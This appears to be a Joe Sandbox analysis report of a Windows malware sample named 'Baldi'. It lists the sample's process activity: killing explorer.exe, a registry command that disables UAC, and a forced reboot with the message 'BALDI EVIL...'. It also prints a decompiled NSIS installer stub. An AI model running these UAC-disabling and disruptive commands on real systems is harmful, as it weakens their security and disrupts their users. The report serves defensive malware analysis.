Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_BatToExe, Description: Yara detected BatToExe compiled binary, Source: 00000004.00000002.380014233.0000000000470000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_BatToExe, Description: Yara detected BatToExe compiled binary, Source: 00000004.00000003.379811354.0000000002370000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_BatToExe, Description: Yara detected BatToExe compiled binary, Source: 00000004.00000003.379822097.00000000001C4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_BatToExe, Description: Yara detected BatToExe compiled binary, Source: 00000004.00000002.380014233.0000000000448000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 21%, ReversingLabs
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 5332, Parent PID: 7140

General

Target ID:	5
Start time:	17:16:40
Start date:	06/06/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff745070000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: taskkill.exePID: 5436, Parent PID: 3156

General

Target ID:	6
Start time:	17:16:40
Start date:	06/06/2023
Path:	C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\taskkill.exe" /f /im explorer.exe
Imagebase:	0xb10000
File size:	74752 bytes
MD5 hash:	15E2E0ACD891510C6268CB8899F2A1A1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 6040, Parent PID: 7140

General

Target ID:	7
Start time:	17:16:40
Start date:	06/06/2023
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd" /c "C:\Users\user\AppData\Local\Temp\FC2B.tmp\FC2C.bat C:\Baldi\DisableUAC.exe
Imagebase:	0x7ff707bb0000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_BatToExe, Description: Yara detected BatToExe compiled binary, Source: 00000007.00000002.379502958.0000016157B60000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_BatToExe, Description: Yara detected BatToExe compiled binary, Source: 00000007.00000003.378633984.0000016157B70000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_BatToExe, Description: Yara detected BatToExe compiled binary, Source: 00000007.00000002.379654166.0000016157B70000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_BatToExe, Description: Yara detected BatToExe compiled binary, Source: 00000007.00000003.379239394.0000016157B6F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_BatToExe, Description: Yara detected BatToExe compiled binary, Source: 00000007.00000002.379709392.0000016157DD0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_BatToExe, Description: Yara detected BatToExe compiled binary, Source: 00000007.00000002.379502958.0000016157B6B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 6844, Parent PID: 5436

General

Target ID:	8
Start time:	17:16:40
Start date:	06/06/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff745070000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: reg.exePID: 5744, Parent PID: 6040

General

Target ID:	9
Start time:	17:16:41
Start date:	06/06/2023
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	reg ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f
Imagebase:	0x7ff7447d0000
File size:	72704 bytes
MD5 hash:	E3DACF0B31841FA02064B4457D44B357
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_BatToExe, Description: Yara detected BatToExe compiled binary, Source: 00000009.00000002.378526790.000001FFF3EF0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_BatToExe, Description: Yara detected BatToExe compiled binary, Source: 00000009.00000002.378545012.000001FFF3F00000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_BatToExe, Description: Yara detected BatToExe compiled binary, Source: 00000009.00000002.378526790.000001FFF3EF4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security

Show Windows behavior

Chronological Activities

Analysis Process: shutdown.exePID: 3816, Parent PID: 6040

General

Target ID:	10
Start time:	17:16:41
Start date:	06/06/2023
Path:	C:\Windows\System32\shutdown.exe
Wow64 process (32bit):	false
Commandline:	shutdown -r -t 1 -c "BALDI EVIL..."
Imagebase:	0x7ff65a9e0000
File size:	26624 bytes
MD5 hash:	7A22F98F0B7BAEEF5FE1965F075A5E95
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_BatToExe, Description: Yara detected BatToExe compiled binary, Source: 0000000A.00000002.379169390.000001E5CE7B0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_BatToExe, Description: Yara detected BatToExe compiled binary, Source: 0000000A.00000002.379112663.000001E5CE4F9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_BatToExe, Description: Yara detected BatToExe compiled binary, Source: 0000000A.00000002.379112663.000001E5CE4F0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_BatToExe, Description: Yara detected BatToExe compiled binary, Source: 0000000A.00000002.379169390.000001E5CE7B4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: file.exePID: 3320, Parent PID: 3452COMMON

Execution Graph

Execution Coverage:	12.9%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	22.7%
Total number of Nodes:	1213
Total number of Limit Nodes:	22

Executed Functions

Function 004030FA Relevance: 70.3, APIs: 24, Strings: 16, Instructions: 270
filestringcomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 81%

			_entry_() {
				struct _SHFILEINFOA _v360;
				struct _SECURITY_ATTRIBUTES* _v376;
				char _v380;
				CHAR* _v384;
				char _v392;
				int _v396;
				int _v400;
				signed int _v404;
				CHAR* _v408;
				int _v412;
				struct _SECURITY_ATTRIBUTES* _v416;
				struct _SECURITY_ATTRIBUTES* _v424;
				void* _v432;
				int _t34;
				CHAR* _t39;
				char* _t42;
				signed int _t44;
				void* _t48;
				int _t50;
				signed int _t51;
				signed int _t54;
				int _t55;
				signed int _t59;
				void* _t78;
				void* _t88;
				void* _t90;
				char* _t95;
				signed int _t96;
				void* _t97;
				signed int _t98;
				signed int _t99;
				signed int _t102;
				CHAR* _t104;
				signed int _t105;
				char _t119;

				_v376 = 0;
				_v384 = "Error writing temporary file. Make sure your temp folder is valid.";
				_t98 = 0;
				_v380 = 0x20;
				__imp__#17();
				_t34 = SetErrorMode(0x8001); // executed
				__imp__OleInitialize(0); // executed
				 *0x42ec18 = _t34;
				 *0x42eb64 = E00405D2E(8);
				SHGetFileInfoA(0x428f98, 0,  &_v360, 0x160, 0); // executed
				E00405A0C(0x42e360, "NSIS Error");
				_t39 = GetCommandLineA();
				_t95 = "\"C:\\Users\\hardz\\Desktop\\file.exe\"";
				E00405A0C(_t95, _t39);
				 *0x42eb60 = GetModuleHandleA(0);
				_t42 = _t95;
				if("\"C:\\Users\\hardz\\Desktop\\file.exe\"" == 0x22) {
					_v404 = 0x22;
					_t42 =  &M00434001;
				}
				_t44 = CharNextA(E0040552A(_t42, _v404));
				_v404 = _t44;
				while(1) {
					_t90 =  *_t44;
					_t108 = _t90;
					if(_t90 == 0) {
						break;
					}
					__eflags = _t90 - 0x20;
					if(_t90 != 0x20) {
						L5:
						__eflags =  *_t44 - 0x22;
						_v404 = 0x20;
						if( *_t44 == 0x22) {
							_t44 = _t44 + 1;
							__eflags = _t44;
							_v404 = 0x22;
						}
						__eflags =  *_t44 - 0x2f;
						if( *_t44 != 0x2f) {
							L15:
							_t44 = E0040552A(_t44, _v404);
							__eflags =  *_t44 - 0x22;
							if(__eflags == 0) {
								_t44 = _t44 + 1;
								__eflags = _t44;
							}
							continue;
						} else {
							_t44 = _t44 + 1;
							__eflags =  *_t44 - 0x53;
							if( *_t44 == 0x53) {
								__eflags = ( *(_t44 + 1) | 0x00000020) - 0x20;
								if(( *(_t44 + 1) | 0x00000020) == 0x20) {
									_t98 = _t98 | 0x00000002;
									__eflags = _t98;
								}
							}
							__eflags =  *_t44 - 0x4352434e;
							if( *_t44 == 0x4352434e) {
								__eflags = ( *(_t44 + 4) | 0x00000020) - 0x20;
								if(( *(_t44 + 4) | 0x00000020) == 0x20) {
									_t98 = _t98 | 0x00000004;
									__eflags = _t98;
								}
							}
							__eflags =  *((intOrPtr*)(_t44 - 2)) - 0x3d442f20;
							if( *((intOrPtr*)(_t44 - 2)) == 0x3d442f20) {
								 *((intOrPtr*)(_t44 - 2)) = 0;
								__eflags = _t44 + 2;
								E00405A0C("C:\\Baldi", _t44 + 2);
								L20:
								_t104 = "C:\\Users\\hardz\\AppData\\Local\\Temp\\";
								GetTempPathA(0x400, _t104); // executed
								_t48 = E004030C6(_t108);
								_t109 = _t48;
								if(_t48 != 0) {
									L22:
									DeleteFileA("1049"); // executed
									_t50 = E00402C22(_t110, _t98); // executed
									_v412 = _t50;
									if(_t50 != 0) {
										L32:
										ExitProcess(); // executed
										__imp__OleUninitialize(); // executed
										if(_v404 == 0) {
											__eflags =  *0x42ebf4;
											if( *0x42ebf4 != 0) {
												_t105 = E00405D2E(3);
												_t99 = E00405D2E(4);
												_t54 = E00405D2E(5);
												__eflags = _t105;
												_t96 = _t54;
												if(_t105 != 0) {
													__eflags = _t99;
													if(_t99 != 0) {
														__eflags = _t96;
														if(_t96 != 0) {
															_t59 =  *_t105(GetCurrentProcess(), 0x28,  &_v392);
															__eflags = _t59;
															if(_t59 != 0) {
																 *_t99(0, "SeShutdownPrivilege",  &_v396);
																_v412 = 1;
																_v400 = 2;
																 *_t96(_v416, 0,  &_v412, 0, 0, 0);
															}
														}
													}
												}
												_t55 = ExitWindowsEx(2, 0);
												__eflags = _t55;
												if(_t55 == 0) {
													E0040140B(9);
												}
											}
											_t51 =  *0x42ec0c;
											__eflags = _t51 - 0xffffffff;
											if(_t51 != 0xffffffff) {
												_v396 = _t51;
											}
											ExitProcess(_v396);
										}
										E004052CD(_v404, 0x200010);
										ExitProcess(2);
									}
									if( *0x42eb7c == 0) {
										L31:
										 *0x42ec0c =  *0x42ec0c | 0xffffffff;
										_v400 = E00403555();
										goto L32;
									}
									_t102 = E0040552A(_t95, 0);
									while(_t102 >= _t95) {
										__eflags =  *_t102 - 0x3d3f5f20;
										if(__eflags == 0) {
											break;
										}
										_t102 = _t102 - 1;
										__eflags = _t102;
									}
									_t114 = _t102 - _t95;
									_v408 = "Error launching installer";
									if(_t102 < _t95) {
										lstrcatA(_t104, "~nsu.tmp");
										if(lstrcmpiA(_t104, "C:\\Users\\hardz\\Desktop") == 0) {
											goto L32;
										}
										CreateDirectoryA(_t104, 0);
										SetCurrentDirectoryA(_t104);
										_t119 = "C:\\Baldi"; // 0x43
										if(_t119 == 0) {
											E00405A0C("C:\\Baldi", "C:\\Users\\hardz\\Desktop");
										}
										E00405A0C(0x42f000, _v396);
										 *0x42f400 = 0x41;
										_t97 = 0x1a;
										do {
											E00405A2E(0, _t97, 0x428b98, 0x428b98,  *((intOrPtr*)( *0x42eb70 + 0x120)));
											DeleteFileA(0x428b98);
											if(_v416 != 0 && CopyFileA("C:\\Users\\hardz\\Desktop\\file.exe", 0x428b98, 1) != 0) {
												_push(0);
												_push(0x428b98);
												E0040575A();
												E00405A2E(0, _t97, 0x428b98, 0x428b98,  *((intOrPtr*)( *0x42eb70 + 0x124)));
												_t78 = E0040526C(0x428b98);
												if(_t78 != 0) {
													CloseHandle(_t78);
													_v416 = 0;
												}
											}
											 *0x42f400 =  *0x42f400 + 1;
											_t97 = _t97 - 1;
										} while (_t97 != 0);
										_push(0);
										_push(_t104);
										E0040575A();
										goto L32;
									}
									 *_t102 = 0;
									_t103 = _t102 + 4;
									if(E004055E0(_t114, _t102 + 4) == 0) {
										goto L32;
									}
									E00405A0C("C:\\Baldi", _t103);
									E00405A0C("C:\\Baldi", _t103);
									_v424 = 0;
									goto L31;
								}
								GetWindowsDirectoryA(_t104, 0x3fb);
								lstrcatA(_t104, "\\Temp");
								_t88 = E004030C6(_t109);
								_t110 = _t88;
								if(_t88 == 0) {
									goto L32;
								}
								goto L22;
							}
							goto L15;
						}
					} else {
						goto L4;
					}
					do {
						L4:
						_t44 = _t44 + 1;
						__eflags =  *_t44 - 0x20;
					} while ( *_t44 == 0x20);
					goto L5;
				}
				goto L20;
			}

0x00403106
0x0040310a
0x00403112
0x00403114
0x00403119
0x00403124
0x0040312b
0x00403133
0x0040313d
0x00403153
0x00403163
0x00403168
0x0040316e
0x00403175
0x00403188
0x0040318d
0x0040318f
0x00403191
0x00403196
0x00403196
0x004031a6
0x004031ac
0x00403215
0x00403215
0x00403217
0x00403219
0x00000000
0x00000000
0x004031b2
0x004031b5
0x004031bd
0x004031bd
0x004031c0
0x004031c5
0x004031c7
0x004031c7
0x004031c8
0x004031c8
0x004031cd
0x004031d0
0x00403205
0x0040320a
0x0040320f
0x00403212
0x00403214
0x00403214
0x00403214
0x00000000
0x004031d2
0x004031d2
0x004031d3
0x004031d6
0x004031de
0x004031e1
0x004031e3
0x004031e3
0x004031e3
0x004031e1
0x004031e6
0x004031ec
0x004031f4
0x004031f7
0x004031f9
0x004031f9
0x004031f9
0x004031f7
0x004031fc
0x00403203
0x0040321d
0x00403220
0x00403229
0x0040322e
0x0040322e
0x00403239
0x0040323f
0x00403244
0x00403246
0x00403268
0x0040326d
0x00403274
0x0040327b
0x0040327f
0x004032e6
0x004032e6
0x004032eb
0x004032f5
0x004033e0
0x004033e6
0x004033f1
0x004033fa
0x004033fc
0x00403401
0x00403403
0x00403405
0x00403407
0x00403409
0x0040340b
0x0040340d
0x0040341d
0x0040341f
0x00403421
0x0040342e
0x0040343d
0x00403445
0x0040344d
0x0040344d
0x00403421
0x0040340d
0x00403409
0x00403452
0x00403458
0x0040345a
0x0040345e
0x0040345e
0x0040345a
0x00403463
0x00403468
0x0040346b
0x0040346d
0x0040346d
0x00403475
0x00403475
0x00403304
0x0040330b
0x0040330b
0x00403287
0x004032d6
0x004032d6
0x004032e2
0x00000000
0x004032e2
0x00403290
0x0040329d
0x00403294
0x0040329a
0x00000000
0x00000000
0x0040329c
0x0040329c
0x0040329c
0x004032a1
0x004032a3
0x004032ab
0x00403317
0x0040332b
0x00000000
0x00000000
0x0040332f
0x00403336
0x0040333c
0x00403342
0x0040334a
0x0040334a
0x00403358
0x0040335f
0x00403368
0x0040336e
0x0040337a
0x00403380
0x0040338a
0x0040339e
0x0040339f
0x004033a0
0x004033b1
0x004033b7
0x004033be
0x004033c1
0x004033c7
0x004033c7
0x004033be
0x004033cb
0x004033d1
0x004033d1
0x004033d4
0x004033d5
0x004033d6
0x00000000
0x004033d6
0x004032ad
0x004032af
0x004032ba
0x00000000
0x00000000
0x004032c2
0x004032cd
0x004032d2
0x00000000
0x004032d2
0x0040324e
0x0040325a
0x0040325f
0x00403264
0x00403266
0x00000000
0x00000000
0x00000000
0x00403266
0x00000000
0x00403203
0x00000000
0x00000000
0x00000000
0x004031b7
0x004031b7
0x004031b7
0x004031b8
0x004031b8
0x00000000
0x004031b7
0x00000000

APIs

#17.COMCTL32 ref: 00403119
SetErrorMode.KERNELBASE(00008001), ref: 00403124
OleInitialize.OLE32(00000000), ref: 0040312B

Part of subcall function 00405D2E: GetModuleHandleA.KERNEL32(?,?,00000000,0040313D,00000008), ref: 00405D40
Part of subcall function 00405D2E: LoadLibraryA.KERNELBASE(?,?,00000000,0040313D,00000008), ref: 00405D4B
Part of subcall function 00405D2E: GetProcAddress.KERNEL32(00000000,?), ref: 00405D5C

SHGetFileInfoA.SHELL32(00428F98,00000000,?,00000160,00000000,00000008), ref: 00403153

Part of subcall function 00405A0C: lstrcpynA.KERNEL32(?,?,00000400,00403168,0042E360,NSIS Error), ref: 00405A19

GetCommandLineA.KERNEL32(0042E360,NSIS Error), ref: 00403168
GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\file.exe",00000000), ref: 0040317B
CharNextA.USER32(00000000,"C:\Users\user\Desktop\file.exe",00000020), ref: 004031A6
GetTempPathA.KERNELBASE(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 00403239
GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040324E
lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040325A
DeleteFileA.KERNELBASE(1049), ref: 0040326D
ExitProcess.KERNEL32(00000000), ref: 004032E6
OleUninitialize.OLE32(00000000), ref: 004032EB
ExitProcess.KERNEL32 ref: 0040330B
lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\file.exe",00000000,00000000), ref: 00403317
lstrcmpiA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\file.exe",00000000,00000000), ref: 00403323
CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040332F
SetCurrentDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\), ref: 00403336
DeleteFileA.KERNEL32(00428B98,00428B98,?,0042F000,?), ref: 00403380
CopyFileA.KERNEL32(C:\Users\user\Desktop\file.exe,00428B98,00000001), ref: 00403394
CloseHandle.KERNEL32(00000000,00428B98,00428B98,?,00428B98,00000000), ref: 004033C1
GetCurrentProcess.KERNEL32(00000028,?,00000005,00000004,00000003), ref: 00403416
ExitWindowsEx.USER32 ref: 00403452
ExitProcess.KERNEL32 ref: 00403475

Strings

~nsu.tmp, xrefs: 00403311
C:\Baldi, xrefs: 00403224, 004032BD, 0040333C, 00403345
"C:\Users\user\Desktop\file.exe", xrefs: 0040316E, 00403174, 0040328A
C:\Baldi, xrefs: 004032C8
1049, xrefs: 00403268
/D=, xrefs: 004031FC
NCRC, xrefs: 004031E6
Error launching installer, xrefs: 004032A3
C:\Users\user\AppData\Local\Temp\, xrefs: 0040322E, 00403233, 0040324D, 00403259, 00403316, 00403322, 0040332E, 00403335, 004033D5
C:\Users\user\Desktop\file.exe, xrefs: 0040338F
_?=, xrefs: 00403294
NSIS Error, xrefs: 00403159
\Temp, xrefs: 00403254
SeShutdownPrivilege, xrefs: 00403428
C:\Users\user\Desktop, xrefs: 0040331C, 00403321, 00403344
", xrefs: 004031C8

Memory Dump Source

Source File: 00000000.00000002.376208479.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.376119832.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376324958.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376799904.0000000000439000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: ExitFileProcess$DirectoryHandle$CurrentDeleteModuleWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
String ID: /D=$ _?=$"$"C:\Users\user\Desktop\file.exe"$1049$C:\Baldi$C:\Baldi$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\file.exe$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp
API String ID: 553446912-653627232
Opcode ID: 9988b600495c781106425a2b08430f5b13329de60f627557ffae5bbab9d6a54a
Instruction ID: 1e9e478c3a9e7f3573a82b9cae4fcf3dc9ecc54075f91e84b1854e8c20532e3f
Opcode Fuzzy Hash: 9988b600495c781106425a2b08430f5b13329de60f627557ffae5bbab9d6a54a
Instruction Fuzzy Hash: 4191D130A08344AFE7216F61AD4AB6B7E9CEB0530AF04057FF541B61D2C77C99058B6E

Uniqueness

Uniqueness Score: -1.00%

Function 00405D2E Relevance: 4.5, APIs: 3, Instructions: 20
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00405D2E(signed int _a4) {
				struct HINSTANCE__* _t5;
				CHAR* _t7;
				signed int _t9;

				_t9 = _a4 << 3;
				_t7 =  *(_t9 + 0x409200);
				_t5 = GetModuleHandleA(_t7);
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t9 + 0x409204));
				}
				_t5 = LoadLibraryA(_t7); // executed
				if(_t5 != 0) {
					goto L2;
				}
				return _t5;
			}

0x00405d36
0x00405d39
0x00405d40
0x00405d48
0x00405d55
0x00000000
0x00405d5c
0x00405d4b
0x00405d53
0x00000000
0x00000000
0x00405d64

APIs

GetModuleHandleA.KERNEL32(?,?,00000000,0040313D,00000008), ref: 00405D40
LoadLibraryA.KERNELBASE(?,?,00000000,0040313D,00000008), ref: 00405D4B
GetProcAddress.KERNEL32(00000000,?), ref: 00405D5C

Memory Dump Source

Source File: 00000000.00000002.376208479.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.376119832.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376324958.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376799904.0000000000439000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: AddressHandleLibraryLoadModuleProc
String ID:
API String ID: 310444273-0
Opcode ID: 7acfb344228b968400b962badda7c36266698eee5c55508006b44164a923ef80
Instruction ID: 58781945b1ebe0d6425232f008294b0fb1b641fb0524d4e5e5734917004db801
Opcode Fuzzy Hash: 7acfb344228b968400b962badda7c36266698eee5c55508006b44164a923ef80
Instruction Fuzzy Hash: 8CE08C36A04510BBD3215B30AE08A6B73ACEEC9B41304897EF615F6251D734AC11DBBA

Uniqueness

Uniqueness Score: -1.00%

Function 00403555 Relevance: 49.2, APIs: 15, Strings: 13, Instructions: 216
stringregistrylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E00403555() {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				int _v16;
				char _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t20;
				void* _t28;
				void* _t30;
				int _t31;
				void* _t34;
				struct HINSTANCE__* _t37;
				int _t38;
				int _t42;
				char _t62;
				CHAR* _t64;
				signed char _t68;
				CHAR* _t79;
				intOrPtr _t81;
				CHAR* _t86;

				_t81 =  *0x42eb70;
				_t20 = E00405D2E(6);
				_t88 = _t20;
				if(_t20 == 0) {
					_t79 = 0x429fe0;
					"1049" = 0x7830;
					E004058F3(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x429fe0, 0);
					__eflags =  *0x429fe0;
					if(__eflags == 0) {
						E004058F3(0x80000003, ".DEFAULT\\Control Panel\\International",  &M00407302, 0x429fe0, 0);
					}
					lstrcatA("1049", _t79);
				} else {
					E0040596A("1049",  *_t20() & 0x0000ffff);
				}
				E0040381E(_t76, _t88);
				_t85 = "C:\\Baldi";
				 *0x42ebe0 =  *0x42eb78 & 0x00000020;
				 *0x42ebfc = 0x10000;
				if(E004055E0(_t88, "C:\\Baldi") != 0) {
					L16:
					if(E004055E0(_t96, _t85) == 0) {
						E00405A2E(0, _t79, _t81, _t85,  *((intOrPtr*)(_t81 + 0x118)));
					}
					_t28 = LoadImageA( *0x42eb60, 0x67, 1, 0, 0, 0x8040); // executed
					 *0x42e348 = _t28;
					if( *((intOrPtr*)(_t81 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t30 = E0040381E(_t76, __eflags);
							__eflags =  *0x42ec00;
							if( *0x42ec00 != 0) {
								_t31 = E00404E7C(_t30, 0);
								__eflags = _t31;
								if(_t31 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x42e32c;
								if( *0x42e32c == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x429fb8, 5);
							_t37 = LoadLibraryA("RichEd20");
							__eflags = _t37;
							if(_t37 == 0) {
								LoadLibraryA("RichEd32");
							}
							_t86 = "RichEdit20A";
							_t38 = GetClassInfoA(0, _t86, 0x42e300);
							__eflags = _t38;
							if(_t38 == 0) {
								GetClassInfoA(0, "RichEdit", 0x42e300);
								 *0x42e324 = _t86;
								RegisterClassA(0x42e300);
							}
							_t42 = DialogBoxParamA( *0x42eb60,  *0x42e340 + 0x00000069 & 0x0000ffff, 0, E004038EB, 0);
							E004034A5(E0040140B(5), 1);
							return _t42;
						}
						L22:
						_t34 = 2;
						return _t34;
					} else {
						_t76 =  *0x42eb60;
						 *0x42e314 = _t28;
						_v20 = 0x624e5f;
						 *0x42e304 = E00401000;
						 *0x42e310 =  *0x42eb60;
						 *0x42e324 =  &_v20;
						if(RegisterClassA(0x42e300) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						_t12 =  &_v16; // 0x624e5f
						SystemParametersInfoA(0x30, 0, _t12, 0);
						 *0x429fb8 = CreateWindowExA(0x80,  &_v20, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x42eb60, 0);
						goto L21;
					}
				} else {
					_t76 =  *(_t81 + 0x48);
					if(_t76 == 0) {
						goto L16;
					}
					_t79 = 0x42db00;
					E004058F3( *((intOrPtr*)(_t81 + 0x44)), _t76,  *((intOrPtr*)(_t81 + 0x4c)) +  *0x42eb98, 0x42db00, 0);
					_t62 =  *0x42db00; // -47
					if(_t62 == 0) {
						goto L16;
					}
					if(_t62 == 0x22) {
						_t79 = 0x42db01;
						 *((char*)(E0040552A(0x42db01, 0x22))) = 0;
					}
					_t64 = lstrlenA(_t79) + _t79 - 4;
					if(_t64 <= _t79 || lstrcmpiA(_t64, ?str?) != 0) {
						L15:
						E00405A0C(_t85, E004054FF(_t79));
						goto L16;
					} else {
						_t68 = GetFileAttributesA(_t79);
						if(_t68 == 0xffffffff) {
							L14:
							E00405546(_t79);
							goto L15;
						}
						_t96 = _t68 & 0x00000010;
						if((_t68 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}

0x0040355b
0x00403564
0x0040356b
0x0040356d
0x00403581
0x00403593
0x0040359d
0x004035a2
0x004035a8
0x004035bb
0x004035bb
0x004035c6
0x0040356f
0x0040357a
0x0040357a
0x004035cb
0x004035d5
0x004035de
0x004035e3
0x004035f4
0x0040367b
0x00403683
0x0040368c
0x0040368c
0x004036a2
0x004036a8
0x004036b6
0x00403745
0x0040374d
0x00403757
0x0040375c
0x00403762
0x004037ec
0x004037f1
0x004037f3
0x0040380f
0x00000000
0x0040380f
0x004037f5
0x004037fb
0x00403803
0x00403803
0x00000000
0x004037fb
0x00403770
0x00403781
0x00403783
0x00403785
0x0040378c
0x0040378c
0x00403794
0x0040379c
0x0040379e
0x004037a0
0x004037a9
0x004037ac
0x004037b2
0x004037b2
0x004037d1
0x004037e2
0x00000000
0x004037e7
0x0040374f
0x00403751
0x00000000
0x004036bc
0x004036bc
0x004036c2
0x004036cc
0x004036d4
0x004036de
0x004036e4
0x004036f2
0x00403814
0x00403814
0x00000000
0x00403814
0x004036f8
0x00403701
0x00403740
0x00000000
0x00403740
0x004035fa
0x004035fa
0x004035ff
0x00000000
0x00000000
0x00403609
0x00403619
0x0040361e
0x00403625
0x00000000
0x00000000
0x00403629
0x0040362b
0x00403638
0x00403638
0x00403640
0x00403646
0x0040366e
